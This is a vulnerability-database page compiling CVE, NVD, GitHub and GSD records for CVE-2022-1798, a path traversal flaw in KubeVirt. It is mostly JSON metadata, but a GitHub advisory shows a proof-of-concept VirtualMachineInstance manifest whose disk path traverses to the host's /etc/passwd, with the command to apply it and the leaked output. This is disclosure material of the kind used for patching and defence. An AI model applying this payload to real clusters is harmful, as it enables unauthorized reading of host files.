Vulnerability-Lookup

CVE-2022-1798 (GCVE-0-2022-1798)

Vulnerability from cvelistv5 – Published: 2022-09-15 15:45 – Updated: 2025-04-21 13:49

Title

Path Traversal vulnerability in Kubevirt

Summary

A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.

Severity ?

8.7 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H

CWE

CWE-20 - Improper Input Validation

Assigner

Google

References

URL

Tags

https://github.com/kubevirt/kubevirt/security/adv…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	Google LLC	Kubevirt	Affected: unspecified , < 0.55.1 (custom) Affected: unspecified , < 0.56.0 (custom)

Credits

Oliver Brooks and James Klopchic of NCC Group Diane Dubois and Roman Mohr of Google

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T00:17:00.704Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-1798",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-21T13:39:15.451210Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-21T13:49:58.573Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "platforms": [
            "all"
          ],
          "product": "Kubevirt",
          "vendor": "Google LLC",
          "versions": [
            {
              "lessThan": "0.55.1",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            },
            {
              "lessThan": "0.56.0",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Oliver Brooks and James Klopchic of NCC Group"
        },
        {
          "lang": "en",
          "value": "Diane Dubois and Roman Mohr of Google"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-20",
              "description": "CWE-20 Improper Input Validation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-09-15T15:45:12.000Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Path Traversal vulnerability in Kubevirt",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@google.com",
          "ID": "CVE-2022-1798",
          "STATE": "PUBLIC",
          "TITLE": "Path Traversal vulnerability in Kubevirt"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Kubevirt",
                      "version": {
                        "version_data": [
                          {
                            "platform": "all",
                            "version_affected": "\u003c",
                            "version_value": "0.55.1"
                          },
                          {
                            "platform": "all",
                            "version_affected": "\u003c",
                            "version_value": "0.56.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Google LLC"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Oliver Brooks and James Klopchic of NCC Group"
          },
          {
            "lang": "eng",
            "value": "Diane Dubois and Roman Mohr of Google"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-20 Improper Input Validation"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364",
              "refsource": "CONFIRM",
              "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364"
            }
          ]
        },
        "source": {
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2022-1798",
    "datePublished": "2022-09-15T15:45:12.000Z",
    "dateReserved": "2022-05-19T00:00:00.000Z",
    "dateUpdated": "2025-04-21T13:49:58.573Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-03T00:17:00.704Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2022-1798\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-04-21T13:39:15.451210Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-04-21T13:39:16.930Z\"}}], \"cna\": {\"title\": \"Path Traversal vulnerability in Kubevirt\", \"source\": {\"discovery\": \"EXTERNAL\"}, \"credits\": [{\"lang\": \"en\", \"value\": \"Oliver Brooks and James Klopchic of NCC Group\"}, {\"lang\": \"en\", \"value\": \"Diane Dubois and Roman Mohr of Google\"}], \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 8.7, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"Google LLC\", \"product\": \"Kubevirt\", \"versions\": [{\"status\": \"affected\", \"version\": \"unspecified\", \"lessThan\": \"0.55.1\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"unspecified\", \"lessThan\": \"0.56.0\", \"versionType\": \"custom\"}], \"platforms\": [\"all\"]}], \"references\": [{\"url\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"x_generator\": {\"engine\": \"Vulnogram 0.0.9\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-20\", \"description\": \"CWE-20 Improper Input Validation\"}]}], \"providerMetadata\": {\"orgId\": \"14ed7db2-1595-443d-9d34-6215bf890778\", \"shortName\": \"Google\", \"dateUpdated\": \"2022-09-15T15:45:12.000Z\"}, \"x_legacyV4Record\": {\"credit\": [{\"lang\": \"eng\", \"value\": \"Oliver Brooks and James Klopchic of NCC Group\"}, {\"lang\": \"eng\", \"value\": \"Diane Dubois and Roman Mohr of Google\"}], \"impact\": {\"cvss\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 8.7, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}, \"source\": {\"discovery\": \"EXTERNAL\"}, \"affects\": {\"vendor\": {\"vendor_data\": [{\"product\": {\"product_data\": [{\"version\": {\"version_data\": [{\"platform\": \"all\", \"version_value\": \"0.55.1\", \"version_affected\": \"\u003c\"}, {\"platform\": \"all\", \"version_value\": \"0.56.0\", \"version_affected\": \"\u003c\"}]}, \"product_name\": \"Kubevirt\"}]}, \"vendor_name\": \"Google LLC\"}]}}, \"data_type\": \"CVE\", \"generator\": {\"engine\": \"Vulnogram 0.0.9\"}, \"references\": {\"reference_data\": [{\"url\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364\", \"name\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364\", \"refsource\": \"CONFIRM\"}]}, \"data_format\": \"MITRE\", \"description\": {\"description_data\": [{\"lang\": \"eng\", \"value\": \"A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible.\"}]}, \"problemtype\": {\"problemtype_data\": [{\"description\": [{\"lang\": \"eng\", \"value\": \"CWE-20 Improper Input Validation\"}]}]}, \"data_version\": \"4.0\", \"CVE_data_meta\": {\"ID\": \"CVE-2022-1798\", \"STATE\": \"PUBLIC\", \"TITLE\": \"Path Traversal vulnerability in Kubevirt\", \"ASSIGNER\": \"security@google.com\"}}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2022-1798\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-04-21T13:49:58.573Z\", \"dateReserved\": \"2022-05-19T00:00:00.000Z\", \"assignerOrgId\": \"14ed7db2-1595-443d-9d34-6215bf890778\", \"datePublished\": \"2022-09-15T15:45:12.000Z\", \"assignerShortName\": \"Google\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

FKIE_CVE-2022-1798

Vulnerability from fkie_nvd - Published: 2022-09-15 16:15 - Updated: 2024-11-21 06:41

Severity ?

8.7 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H
6.5 (Medium) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Summary

References

	URL	Tags
	cve-coordination@google.com	https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364	Exploit, Mitigation, Patch, Third Party Advisory
	af854a3a-2127-422b-91ae-364da2661108	https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364	Exploit, Mitigation, Patch, Third Party Advisory

Impacted products

	Vendor	Product	Version
	kubevirt	kubevirt	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*",
              "matchCriteriaId": "E3E349C1-0216-47B4-B160-13C5B99BC633",
              "versionEndExcluding": "0.55.1",
              "versionStartIncluding": "0.20.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible."
    },
    {
      "lang": "es",
      "value": "Una vulnerabilidad de salto de ruta en KubeVirt versiones hasta 0.56 (y 0.55.1) en todas las plataformas permite a un usuario capaz de configurar el kubevirt para leer archivos arbitrarios en el sistema de archivos del host que son legibles p\u00fablicamente o que son legibles para UID 107 o GID 107. /proc/self/() no es accesible"
    }
  ],
  "id": "CVE-2022-1798",
  "lastModified": "2024-11-21T06:41:29.633",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.0,
        "impactScore": 6.0,
        "source": "cve-coordination@google.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.0,
        "impactScore": 4.0,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2022-09-15T16:15:10.107",
  "references": [
    {
      "source": "cve-coordination@google.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Mitigation",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364"
    }
  ],
  "sourceIdentifier": "cve-coordination@google.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "cve-coordination@google.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GHSA-CVX8-PPMC-78HM

Vulnerability from github – Published: 2022-08-18 19:02 – Updated: 2022-09-30 00:44

Summary

Duplicate Advisory: KubeVirt arbitrary host file read from the VM

Details

Duplicate Advisory

This advisory is a duplicate of GHSA-qv98-3369-g364. This link is maintained to preserve external references.

Original Description

Summary As part of a Kubevirt audit performed by NCC group, a finding dealing with systemic lack of path sanitization which leads to a path traversal was identified. Google tested the exploitability of the paths in the audit report and identified that when combined with another vulnerability one of the paths leads to an arbitrary file read on the host from the VM.

The read operations are limited to files which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.

Severity

Moderate - The vulnerability is proven to exist in an open source version of KubeVirt by NCC Group while being combined with Systemic Lack of Path Sanitization, which leads to Path traversal.

Proof of Concept

The initial VMI specifications can be written as such to reproduce the issue:


apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  name: vmi-fedora
spec:
  domain:
    devices:
      disks:
      - disk:
          bus: virtio
        name: containerdisk
      - disk:
          bus: virtio
        name: cloudinitdisk
      - disk:
          bus: virtio
        name: containerdisk1
      rng: {}
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0
    name: containerdisk
  - containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0
      path: test3/../../../../../../../../etc/passwd
    name: containerdisk1
  - cloudInitNoCloud:
      userData: |
        #!/bin/sh
        echo 'just something to make cirros happy'
    name: cloudinitdisk

The VMI can then be started through kubectl apply -f vm-test-ncc.yaml. The requested file is accessible once the VM is up and can be accessed under /dev/vdc.

Depending on the environment, path may contain more or less /.., something that can easily be tested by checking the events until the VMI can start without failure. Restrictions

SELinux may mitigate this vulnerability.

When using a node with selinux, selinux denies the access and the VM start was aborted:


19s         Warning   SyncFailed                virtualmachineinstance/vmi-fedora    server error. command SyncVMI failed: "preparing ephemeral container disk images failed: stat /var/run/kubevirt/container-disks/disk_0.img: permission denied"

type=AVC msg=audit(1651828898.296:1266): avc:  denied  { setattr } for  pid=44402 comm="rpc-worker" name="passwd" dev="vda1" ino=691477 scontext=system_u:system_r:virt_launcher.process:s0:c255,c849 tcontext=system_u:object_r:passwd_file_t:s0 tclass=file permissive=1

After making selinux permissive the VM can boot and access /etc/passwd from the node within the guest:


$ sudo cat /dev/vdc
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[...]

Further Analysis In order to mitigate this vulnerability, Sanitize imagePath in pkg/container-disk/container-disk.go following ISE best practices described and Add checks in pkg/virt-api/webhooks/validating-webhook/admitters/vmi-create-admitter.go

Timeline Date reported: 05/10/2022 Date fixed: N/A Date disclosed: 08/08/2022

Severity ?

6.5 (Medium)


                  
                    CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "kubevirt.io/kubevirt"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.20.0"
            },
            {
              "fixed": "0.55.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-1798"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-08-18T19:02:18Z",
    "nvd_published_at": "2022-09-15T16:15:00Z",
    "severity": "MODERATE"
  },
  "details": "## Duplicate Advisory\nThis advisory is a duplicate of [GHSA-qv98-3369-g364](https://github.com/advisories/GHSA-qv98-3369-g364). This link is maintained to preserve external references.\n\n## Original Description\n\n**Summary**\nAs part of a Kubevirt audit performed by NCC group, a finding dealing with systemic lack of path sanitization which leads to a path traversal was identified.  Google tested the exploitability of the paths in the audit report and identified that when combined with another vulnerability one of the paths leads to an arbitrary file read on the host from the VM.\n\nThe read operations are limited to files which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible.\n\n**Severity**\n\nModerate - The vulnerability is proven to exist in an open source version of KubeVirt by NCC Group while being combined with Systemic Lack of Path Sanitization, which leads to Path traversal.\n\n**Proof of Concept**\n\nThe initial VMI specifications can be written as such to reproduce the issue:\n\n```\n\napiVersion: kubevirt.io/v1\nkind: VirtualMachineInstance\nmetadata:\n  name: vmi-fedora\nspec:\n  domain:\n    devices:\n      disks:\n      - disk:\n          bus: virtio\n        name: containerdisk\n      - disk:\n          bus: virtio\n        name: cloudinitdisk\n      - disk:\n          bus: virtio\n        name: containerdisk1\n      rng: {}\n    resources:\n      requests:\n        memory: 1024M\n  terminationGracePeriodSeconds: 0\n  volumes:\n  - containerDisk:\n      image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0\n    name: containerdisk\n  - containerDisk:\n      image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0\n      path: test3/../../../../../../../../etc/passwd\n    name: containerdisk1\n  - cloudInitNoCloud:\n      userData: |\n        #!/bin/sh\n        echo \u0027just something to make cirros happy\u0027\n    name: cloudinitdisk\n\n\n```\nThe VMI can then be started through kubectl apply -f vm-test-ncc.yaml.\nThe requested file is accessible once the VM is up and can be accessed under /dev/vdc.\n\nDepending on the environment, path may contain more or less /.., something that can easily be tested by checking the events until the VMI can start without failure.\nRestrictions \n\nSELinux may mitigate this vulnerability.\n\nWhen using a node with selinux, selinux denies the access and the VM start was aborted:\n\n```\n\n19s         Warning   SyncFailed                virtualmachineinstance/vmi-fedora    server error. command SyncVMI failed: \"preparing ephemeral container disk images failed: stat /var/run/kubevirt/container-disks/disk_0.img: permission denied\"\n\ntype=AVC msg=audit(1651828898.296:1266): avc:  denied  { setattr } for  pid=44402 comm=\"rpc-worker\" name=\"passwd\" dev=\"vda1\" ino=691477 scontext=system_u:system_r:virt_launcher.process:s0:c255,c849 tcontext=system_u:object_r:passwd_file_t:s0 tclass=file permissive=1\n\n```\n\nAfter making selinux permissive the VM can boot and access /etc/passwd from the node within the guest:\n\n```\n\n$ sudo cat /dev/vdc\nroot:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\n[...]\n\n```\n\n**Further Analysis**\nIn order to mitigate this vulnerability, Sanitize imagePath in pkg/container-disk/container-disk.go following ISE best practices described and Add checks in pkg/virt-api/webhooks/validating-webhook/admitters/vmi-create-admitter.go\n\n**Timeline**\nDate reported: 05/10/2022\nDate fixed: N/A\nDate disclosed: 08/08/2022",
  "id": "GHSA-cvx8-ppmc-78hm",
  "modified": "2022-09-30T00:44:46Z",
  "published": "2022-08-18T19:02:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kubevirt/kubevirt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Duplicate Advisory: KubeVirt arbitrary host file read from the VM",
  "withdrawn": "2022-09-30T00:44:46Z"
}

GSD-2022-1798

Vulnerability from gsd - Updated: 2023-12-13 01:19

Details

Aliases

CVE-2022-1798

Aliases

CVE-2022-1798

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2022-1798",
    "description": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible.",
    "id": "GSD-2022-1798",
    "references": [
      "https://www.suse.com/security/cve/CVE-2022-1798.html",
      "https://access.redhat.com/errata/RHSA-2022:6351",
      "https://access.redhat.com/errata/RHSA-2022:6526",
      "https://access.redhat.com/errata/RHSA-2022:6681",
      "https://access.redhat.com/errata/RHSA-2022:6890",
      "https://access.redhat.com/errata/RHSA-2023:0408"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2022-1798"
      ],
      "details": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible.",
      "id": "GSD-2022-1798",
      "modified": "2023-12-13T01:19:28.118584Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security@google.com",
        "ID": "CVE-2022-1798",
        "STATE": "PUBLIC",
        "TITLE": "Path Traversal vulnerability in Kubevirt"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "Kubevirt",
                    "version": {
                      "version_data": [
                        {
                          "platform": "all",
                          "version_affected": "\u003c",
                          "version_value": "0.55.1"
                        },
                        {
                          "platform": "all",
                          "version_affected": "\u003c",
                          "version_value": "0.56.0"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "Google LLC"
            }
          ]
        }
      },
      "credit": [
        {
          "lang": "eng",
          "value": "Oliver Brooks and James Klopchic of NCC Group"
        },
        {
          "lang": "eng",
          "value": "Diane Dubois and Roman Mohr of Google"
        }
      ],
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible."
          }
        ]
      },
      "generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "impact": {
        "cvss": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H",
          "version": "3.1"
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "CWE-20 Improper Input Validation"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364",
            "refsource": "CONFIRM",
            "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364"
          }
        ]
      },
      "source": {
        "discovery": "EXTERNAL"
      }
    },
    "gitlab.com": {
      "advisories": [
        {
          "affected_range": "\u003e=0.20.0 \u003c0.55.1",
          "affected_versions": "All versions starting from 0.20.0 before 0.55.1",
          "cvss_v3": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
          "cwe_ids": [
            "CWE-1035",
            "CWE-22",
            "CWE-937"
          ],
          "date": "2022-09-19",
          "description": "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/\u003c\u003e is not accessible.",
          "fixed_versions": [
            "0.55.1"
          ],
          "identifier": "CVE-2022-1798",
          "identifiers": [
            "CVE-2022-1798",
            "GHSA-qv98-3369-g364"
          ],
          "not_impacted": "",
          "package_slug": "go/github.com/kubevirt/kubevirt",
          "pubdate": "2022-09-15",
          "solution": "Upgrade to version 0.55.1 or above.",
          "title": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
          "urls": [
            "https://nvd.nist.gov/vuln/detail/CVE-2022-1798",
            "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364"
          ],
          "uuid": "53248d19-699a-448b-8098-ab304adcac1a"
        },
        {
          "affected_range": "\u003c=0.53",
          "affected_versions": "All versions up to 0.53",
          "cwe_ids": [
            "CWE-1035",
            "CWE-352",
            "CWE-937"
          ],
          "date": "2022-08-18",
          "description": "Relative Path Traversal in kubevirt.io/kubevirt.",
          "fixed_versions": [],
          "identifier": "GMS-2022-3668",
          "identifiers": [
            "GHSA-cvx8-ppmc-78hm",
            "GMS-2022-3668",
            "CVE-2022-1798"
          ],
          "not_impacted": "",
          "package_slug": "go/kubevirt.io/kubevirt",
